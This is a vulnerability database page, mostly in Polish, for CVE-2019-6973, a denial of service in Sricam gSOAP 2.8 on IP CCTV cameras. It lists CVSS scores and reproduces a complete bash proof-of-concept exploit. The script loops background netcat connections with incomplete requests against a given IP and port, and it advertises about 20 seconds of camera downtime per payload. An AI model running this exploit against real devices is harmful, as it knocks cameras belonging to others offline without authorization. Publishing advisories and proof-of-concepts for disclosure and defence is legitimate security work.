Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Sricam gSOAP 2.8 Denial Of Service
2019.01.29
Credit:
Andrew Watson
Risk:
Medium
Local:
Yes
Remote:
No
CVE:
CVE-2019-6973
CWE:
CWE-119
Ogólna skala CVSS:
5/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Brak
Wpływ na dostępność:
Częściowy
#!/bin/bash ####################################################################################### # # Exploit Title: Sricam gSOAP 2.8 - Denial of Service # Date: 25/01/2019 # Vendor Status: Informed (24/10/2018) # CVE ID: CVE-2019-6973 # Exploit Author: Andrew Watson # Contact: https://keybase.io/bitfu # Software Version: Sricam gSOAP 2.8 # Vendor Homepage: http://www.sricam.com/ # Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000 # PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service, # exploitable by sending multiple incomplete requests. # References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit # # DISCLAIMER: This proof of concept is provided for educational purposes only! # ####################################################################################### if [ -z "$3" ]; then echo "#############################################################################" echo -e "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu" echo -e "\n[*] Usage: $0 <IP_Address> <Port> <#_DoS_Payloads>" echo "[*] Example: $0 127.0.0.1 5000 10" echo -e "\n[!] Each DoS payload sent adds another 20 seconds downtime.\n" exit 0 fi time=$(expr $3 \* 20) echo "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu" echo -e "\n[+] Sending $3 DoS payloads..." echo "[+] Expected downtime: $time seconds" for dos in $(seq 1 $3); do netcat $1 $2 & done echo -e "\n[!] $dos DoS payloads sent to: $1:$2" echo
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top